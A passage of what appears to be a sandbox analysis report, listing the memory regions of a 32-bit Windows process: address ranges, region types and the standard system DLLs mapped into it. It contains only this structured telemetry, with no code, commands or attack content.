	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 964
	        start_va = 0x77810000
	          end_va = 0x77956fff
	     entry_point = 0x77810000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 1018
	        start_va = 0x20000
	          end_va = 0x23fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 1019
	        start_va = 0x810000
	          end_va = 0x81ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000810000"
	        filename = ""

Region:
	              id = 1020
	        start_va = 0x6fff0000
	          end_va = 0x6fff7fff
	     entry_point = 0x6fff0000
	     region_type = mapped_file
	            name = "version.dll"
	        filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")

Region:
	              id = 1021
	        start_va = 0x70000000
	          end_va = 0x7000efff
	     entry_point = 0x70000000
	     region_type = mapped_file
	            name = "cmutil.dll"
	        filename = "\\Windows\\SysWOW64\\cmutil.dll" (normalized: "c:\\windows\\syswow64\\cmutil.dll")

Region:
	              id = 1022
	        start_va = 0x74680000
	          end_va = 0x74689fff
	     entry_point = 0x74680000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 1023
	        start_va = 0x74690000
	          end_va = 0x746adfff
	     entry_point = 0x74690000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 1024
	        start_va = 0x74720000
	          end_va = 0x74763fff
	     entry_point = 0x74720000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 1025
	        start_va = 0x74aa0000
	          end_va = 0x74b1afff
	     entry_point = 0x74aa0000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 1026
	        start_va = 0x75070000
	          end_va = 0x7511cfff
	     entry_point = 0x75070000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 1027
	        start_va = 0x773a0000
	          end_va = 0x773f7fff
	     entry_point = 0x773a0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 1030
	        start_va = 0x30000
	          end_va = 0x30fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000030000"
	        filename = ""

Region:
	              id = 1031
	        start_va = 0x1c0000
	          end_va = 0x1c0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1032
	        start_va = 0x820000
	          end_va = 0x9a7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000820000"
	        filename = ""

Region:
	              id = 1033
	        start_va = 0x9b0000
	          end_va = 0xb30fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000009b0000"
	        filename = ""

Region:
	              id = 1034
	        start_va = 0xb40000
	          end_va = 0x1f3ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000b40000"
	        filename = ""

Region:
	              id = 1035
	        start_va = 0x772e0000
	          end_va = 0x7730afff
	     entry_point = 0x772e0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1036
	        start_va = 0x6ffa0000
	          end_va = 0x6ffe9fff
	     entry_point = 0x6ffa0000
	     region_type = mapped_file
	            name = "eappcfg.dll"
	        filename = "\\Windows\\SysWOW64\\eappcfg.dll" (normalized: "c:\\windows\\syswow64\\eappcfg.dll")

Region:
	              id = 1037
	        start_va = 0x1d0000
	          end_va = 0x1d0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001d0000"
	        filename = ""

Region:
	              id = 1039
	        start_va = 0x1e0000
	          end_va = 0x1e0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001e0000"
	        filename = ""

Region:
	              id = 1040
	        start_va = 0x480000
	          end_va = 0x4b2fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000480000"
	        filename = ""

Region:
	              id = 1041
	        start_va = 0x702b0000
	          end_va = 0x704bcfff
	     entry_point = 0x702b0000
	     region_type = mapped_file
	            name = "wininet.dll"
	        filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")

Region:
	              id = 1042
	        start_va = 0x74880000
	          end_va = 0x74a3cfff
	     entry_point = 0x74880000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 1043
	        start_va = 0x74b20000
	          end_va = 0x74b64fff
	     entry_point = 0x74b20000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 1049
	        start_va = 0x772c0000
	          end_va = 0x772c5fff
	     entry_point = 0x772c0000
	     region_type = mapped_file
	            name = "psapi.dll"
	        filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")

Region:
	              id = 1050
	        start_va = 0x701e0000
	          end_va = 0x701f8fff
	     entry_point = 0x701e0000
	     region_type = mapped_file
	            name = "userenv.dll"
	        filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll")

Region:
	              id = 1051
	        start_va = 0x766e0000
	          end_va = 0x766eefff
	     entry_point = 0x766e0000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")

Region:
	              id = 1052
	        start_va = 0x746c0000
	          end_va = 0x7471efff
	     entry_point = 0x746c0000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 1053
	        start_va = 0x70210000
	          end_va = 0x702aafff
	     entry_point = 0x70210000
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")

Region:
	              id = 1054
	        start_va = 0x77490000
	          end_va = 0x774a2fff
	     entry_point = 0x77490000
	     region_type = mapped_file
	            name = "netapi32.dll"
	        filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll")

Region:
	              id = 1055
	        start_va = 0x6ff90000
	          end_va = 0x6ff99fff
	     entry_point = 0x6ff90000
	     region_type = mapped_file
	            name = "netutils.dll"
	        filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll")

Region:
	              id = 1056
	        start_va = 0x6ff70000
	          end_va = 0x6ff84fff
	     entry_point = 0x6ff70000
	     region_type = mapped_file
	            name = "samcli.dll"
	        filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll")

Region:
	              id = 1057
	        start_va = 0x6ff60000
	          end_va = 0x6ff69fff
	     entry_point = 0x6ff60000
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")

Region:
	              id = 1058
	        start_va = 0x75120000
	          end_va = 0x7651efff
	     entry_point = 0x75120000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")

Region:
	              id = 1059
	        start_va = 0x76ec0000
	          end_va = 0x76ef6fff
	     entry_point = 0x76ec0000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")

Region:
	              id = 1060
	        start_va = 0x74b70000
	          end_va = 0x75068fff
	     entry_point = 0x74b70000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")

Region:
	              id = 1061
	        start_va = 0x77760000
	          end_va = 0x7776bfff
	     entry_point = 0x77760000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 1062
	        start_va = 0x77400000
	          end_va = 0x7748cfff
	     entry_point = 0x77400000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")

Region:
	              id = 1063
	        start_va = 0x74770000
	          end_va = 0x747b3fff
	     entry_point = 0x74770000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")

Region:
	              id = 1064
	        start_va = 0x771d0000
	          end_va = 0x772bafff
	     entry_point = 0x771d0000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 1065
	        start_va = 0x1f40000
	          end_va = 0x1fd0fff
	     entry_point = 0x1f40000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 1066
	        start_va = 0x780000
	          end_va = 0x7bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000780000"
	        filename = ""

Region:
	              id = 1067
	        start_va = 0x1f40000
	          end_va = 0x203ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000001f40000"
	        filename = ""

Region:
	              id = 1068
	        start_va = 0x2040000
	          end_va = 0x2376fff
	     entry_point = 0x2040000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1069
	        start_va = 0x7c0000
	          end_va = 0x7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007c0000"
	        filename = ""

Region:
	              id = 1070
	        start_va = 0x2380000
	          end_va = 0x247ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002380000"
	        filename = ""

Region:
	              id = 1071
	        start_va = 0x721f0000
	          end_va = 0x724bafff
	     entry_point = 0x721f0000
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")

Region:
	              id = 1072
	        start_va = 0x800000
	          end_va = 0x800fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000800000"
	        filename = ""

Region:
	              id = 1073
	        start_va = 0x76b60000
	          end_va = 0x76bf1fff
	     entry_point = 0x76b60000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 1074
	        start_va = 0x2480000
	          end_va = 0x2480fff
	     entry_point = 0x2480000
	     region_type = mapped_file
	            name = "counters.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat")

Region:
	              id = 1075
	        start_va = 0x70b90000
	          end_va = 0x70ba1fff
	     entry_point = 0x70b90000
	     region_type = mapped_file
	            name = "ondemandconnroutehelper.dll"
	        filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")

Region:
	              id = 1077
	        start_va = 0x71d30000
	          end_va = 0x71d5efff
	     entry_point = 0x71d30000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")

Region:
	              id = 1078
	        start_va = 0x2490000
	          end_va = 0x2493fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002490000"
	        filename = ""

Region:
	              id = 1079
	        start_va = 0x24a0000
	          end_va = 0x24dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000024a0000"
	        filename = ""

Region:
	              id = 1080
	        start_va = 0x24e0000
	          end_va = 0x25dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000024e0000"
	        filename = ""

Region:
	              id = 1081
	        start_va = 0x71ea0000
	          end_va = 0x71eeefff
	     entry_point = 0x71ea0000
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")

Region:
	              id = 1082
	        start_va = 0x70200000
	          end_va = 0x70207fff
	     entry_point = 0x70200000
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll")

Region:
	              id = 1083
	        start_va = 0x774b0000
	          end_va = 0x774b6fff
	     entry_point = 0x774b0000
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")

Region:
	              id = 1084
	        start_va = 0x6ff40000
	          end_va = 0x6ff52fff
	     entry_point = 0x6ff40000
	     region_type = mapped_file
	            name = "samlib.dll"
	        filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll")

Region:
	              id = 1085
	        start_va = 0x25e0000
	          end_va = 0x261ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000025e0000"
	        filename = ""

Region:
	              id = 1086
	        start_va = 0x2620000
	          end_va = 0x271ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002620000"
	        filename = ""

Region:
	              id = 1087
	        start_va = 0x2720000
	          end_va = 0x275ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002720000"
	        filename = ""

Region:
	              id = 1088
	        start_va = 0x2760000
	          end_va = 0x285ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002760000"
	        filename = ""

Region:
	              id = 1089
	        start_va = 0x71d60000
	          end_va = 0x71de3fff
	     entry_point = 0x71d60000
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")

Region:
	              id = 1090
	        start_va = 0x704c0000
	          end_va = 0x7063dfff
	     entry_point = 0x704c0000
	     region_type = mapped_file
	            name = "urlmon.dll"
	        filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")

Region:
	              id = 1091
	        start_va = 0x2860000
	          end_va = 0x2860fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002860000"
	        filename = ""

Region:
	              id = 1092
	        start_va = 0x2870000
	          end_va = 0x28affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002870000"
	        filename = ""

Region:
	              id = 1093
	        start_va = 0x28b0000
	          end_va = 0x29affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000028b0000"
	        filename = ""

Region:
	              id = 1094
	        start_va = 0x29b0000
	          end_va = 0x29effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000029b0000"
	        filename = ""

Region:
	              id = 1095
	        start_va = 0x29f0000
	          end_va = 0x2aeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000029f0000"
	        filename = ""

Region:
	              id = 1096
	        start_va = 0x2af0000
	          end_va = 0x2af0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002af0000"
	        filename = ""

Region:
	              id = 1097
	        start_va = 0x77310000
	          end_va = 0x77393fff
	     entry_point = 0x77310000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 1098
	        start_va = 0x2b00000
	          end_va = 0x2b3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002b00000"
	        filename = ""

Region:
	              id = 1099
	        start_va = 0x2b40000
	          end_va = 0x2c3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002b40000"
	        filename = ""

Region:
	              id = 1100
	        start_va = 0x71cd0000
	          end_va = 0x71d16fff
	     entry_point = 0x71cd0000
	     region_type = mapped_file
	            name = "fwpuclnt.dll"
	        filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")

Region:
	              id = 1101
	        start_va = 0x74330000
	          end_va = 0x7434afff
	     entry_point = 0x74330000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")

Region:
	              id = 1102
	        start_va = 0x71d20000
	          end_va = 0x71d27fff
	     entry_point = 0x71d20000
	     region_type = mapped_file
	            name = "rasadhlp.dll"
	        filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")

Region:
	              id = 1103
	        start_va = 0x2c40000
	          end_va = 0x2c41fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002c40000"
	        filename = ""

Region:
	              id = 1104
	        start_va = 0x2c50000
	          end_va = 0x2c50fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002c50000"
	        filename = ""

Region:
	              id = 1105
	        start_va = 0x2c60000
	          end_va = 0x305afff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002c60000"
	        filename = ""

Region:
	              id = 1106
	        start_va = 0x70120000
	          end_va = 0x70183fff
	     entry_point = 0x70120000
	     region_type = mapped_file
	            name = "schannel.dll"
	        filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")

Region:
	              id = 1107
	        start_va = 0x77050000
	          end_va = 0x771c7fff
	     entry_point = 0x77050000
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")

Region:
	              id = 1108
	        start_va = 0x772d0000
	          end_va = 0x772ddfff
	     entry_point = 0x772d0000
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")

Region:
	              id = 1109
	        start_va = 0x3060000
	          end_va = 0x3060fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003060000"
	        filename = ""

Region:
	              id = 1110
	        start_va = 0x700c0000
	          end_va = 0x700ebfff
	     entry_point = 0x700c0000
	     region_type = mapped_file
	            name = "ntasn1.dll"
	        filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")

Region:
	              id = 1111
	        start_va = 0x700f0000
	          end_va = 0x7010ffff
	     entry_point = 0x700f0000
	     region_type = mapped_file
	            name = "ncrypt.dll"
	        filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")

Region:
	              id = 1112
	        start_va = 0x70110000
	          end_va = 0x7011ffff
	     entry_point = 0x70110000
	     region_type = mapped_file
	            name = "mskeyprotect.dll"
	        filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")

Region:
	              id = 1113
	        start_va = 0x70090000
	          end_va = 0x70097fff
	     entry_point = 0x70090000
	     region_type = mapped_file
	            name = "dpapi.dll"
	        filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll")

Region:
	              id = 1114
	        start_va = 0x76c00000
	          end_va = 0x76c41fff
	     entry_point = 0x76c00000
	     region_type = mapped_file
	            name = "wintrust.dll"
	        filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll")

Region:
	              id = 1115
	        start_va = 0x70070000
	          end_va = 0x70082fff
	     entry_point = 0x70070000
	     region_type = mapped_file
	            name = "cryptsp.dll"
	        filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")

Region:
	              id = 1116
	        start_va = 0x70040000
	          end_va = 0x7006efff
	     entry_point = 0x70040000
	     region_type = mapped_file
	            name = "rsaenh.dll"
	        filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")

Region:
	              id = 1118
	        start_va = 0x3060000
	          end_va = 0x309ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003060000"
	        filename = ""

Region:
	              id = 1119
	        start_va = 0x30a0000
	          end_va = 0x319ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000030a0000"
	        filename = ""

Region:
	              id = 1120
	        start_va = 0x31a0000
	          end_va = 0x329ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000031a0000"
	        filename = ""

Region:
	              id = 1121
	        start_va = 0x6ff20000
	          end_va = 0x6ff3efff
	     entry_point = 0x6ff20000
	     region_type = mapped_file
	            name = "gpapi.dll"
	        filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll")

Region:
	              id = 1122
	        start_va = 0x6fef0000
	          end_va = 0x6ff14fff
	     entry_point = 0x6fef0000
	     region_type = mapped_file
	            name = "cryptnet.dll"
	        filename = "\\Windows\\SysWOW64\\cryptnet.dll" (normalized: "c:\\windows\\syswow64\\cryptnet.dll")

Region:
	              id = 1123
	        start_va = 0x32a0000
	          end_va = 0x32dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000032a0000"
	        filename = ""

Region:
	              id = 1124
	        start_va = 0x32e0000
	          end_va = 0x33dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000032e0000"
	        filename = ""

Region:
	              id = 1125
	        start_va = 0x70e40000
	          end_va = 0x70e52fff
	     entry_point = 0x70e40000
	     region_type = mapped_file
	            name = "dhcpcsvc6.dll"
	        filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")

Region:
	              id = 1126
	        start_va = 0x70e20000
	          end_va = 0x70e33fff
	     entry_point = 0x70e20000
	     region_type = mapped_file
	            name = "dhcpcsvc.dll"
	        filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")

Region:
	              id = 1127
	        start_va = 0x6fe80000
	          end_va = 0x6fee7fff
	     entry_point = 0x6fe80000
	     region_type = mapped_file
	            name = "webio.dll"
	        filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll")

Region:
	              id = 1128
	        start_va = 0x33e0000
	          end_va = 0x33e4fff
	     entry_point = 0x33e0000
	     region_type = mapped_file
	            name = "winnlsres.dll"
	        filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll")

Region:
	              id = 1129
	        start_va = 0x33f0000
	          end_va = 0x33fffff
	     entry_point = 0x33f0000
	     region_type = mapped_file
	            name = "winnlsres.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui")

Region:
	              id = 1130
	        start_va = 0x3400000
	          end_va = 0x343ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003400000"
	        filename = ""

Region:
	              id = 1131
	        start_va = 0x3440000
	          end_va = 0x353ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003440000"
	        filename = ""

Region:
	              id = 1132
	        start_va = 0x3540000
	          end_va = 0x373ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003540000"
	        filename = ""

Region:
	              id = 1133
	        start_va = 0x6fe50000
	          end_va = 0x6fe70fff
	     entry_point = 0x6fe50000
	     region_type = mapped_file
	            name = "cabinet.dll"
	        filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll")

Region:
	              id = 1135
	        start_va = 0x700a0000
	          end_va = 0x700b9fff
	     entry_point = 0x700a0000
	     region_type = mapped_file
	            name = "ncryptsslp.dll"
	        filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")

Region:
	              id = 1136
	        start_va = 0x3740000
	          end_va = 0x3b0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003740000"
	        filename = ""

Region:
	              id = 1140
	        start_va = 0x3b10000
	          end_va = 0x409efff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003b10000"
	        filename = ""

Region:
	              id = 1141
	        start_va = 0x40a0000
	          end_va = 0x449ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000040a0000"
	        filename = ""

Region:
	              id = 1142
	        start_va = 0x32a0000
	          end_va = 0x33a1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000032a0000"
	        filename = ""

Region:
	              id = 1143
	        start_va = 0x44a0000
	          end_va = 0x4618fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000044a0000"
	        filename = ""

Region:
	              id = 1144
	        start_va = 0x4620000
	          end_va = 0x481bfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004620000"
	        filename = ""

Region:
	              id = 1145
	        start_va = 0x4820000
	          end_va = 0x4a98fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004820000"
	        filename = ""

Region:
	              id = 1146
	        start_va = 0x44a0000
	          end_va = 0x4799fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000044a0000"
	        filename = ""

Region:
	              id = 1147
	        start_va = 0x47a0000
	          end_va = 0x4b12fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047a0000"
	        filename = ""

Region:
	              id = 1149
	        start_va = 0x4b20000
	          end_va = 0x4ee1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004b20000"
	        filename = ""

Region:
	              id = 1150
	        start_va = 0x44a0000
	          end_va = 0x4a35fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000044a0000"
	        filename = ""

Region:
	              id = 1190
	        start_va = 0x4a40000
	          end_va = 0x4fd4fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a40000"
	        filename = ""

Region:
	              id = 1191
	        start_va = 0x6fe20000
	          end_va = 0x6fe4cfff
	     entry_point = 0x6fe20000
	     region_type = mapped_file
	            name = "winscard.dll"
	        filename = "\\Windows\\SysWOW64\\WinSCard.dll" (normalized: "c:\\windows\\syswow64\\winscard.dll")

Region:
	              id = 1197
	        start_va = 0x72770000
	          end_va = 0x72791fff
	     entry_point = 0x72770000
	     region_type = mapped_file
	            name = "devobj.dll"
	        filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll")

Region:
	              id = 1206
	        start_va = 0x6fe00000
	          end_va = 0x6fe1bfff
	     entry_point = 0x6fe00000
	     region_type = mapped_file
	            name = "srvcli.dll"
	        filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll")

Region:
	              id = 1207
	        start_va = 0x6fdf0000
	          end_va = 0x6fdfefff
	     entry_point = 0x6fdf0000
	     region_type = mapped_file
	            name = "browcli.dll"
	        filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll")

Region:
	              id = 1208
	        start_va = 0x6fdc0000
	          end_va = 0x6fde3fff
	     entry_point = 0x6fdc0000
	     region_type = mapped_file
	            name = "winmm.dll"
	        filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll")

Region:
	              id = 1209
	        start_va = 0x6fd90000
	          end_va = 0x6fdb2fff
	     entry_point = 0x6fd90000
	     region_type = mapped_file
	            name = "winmmbase.dll"
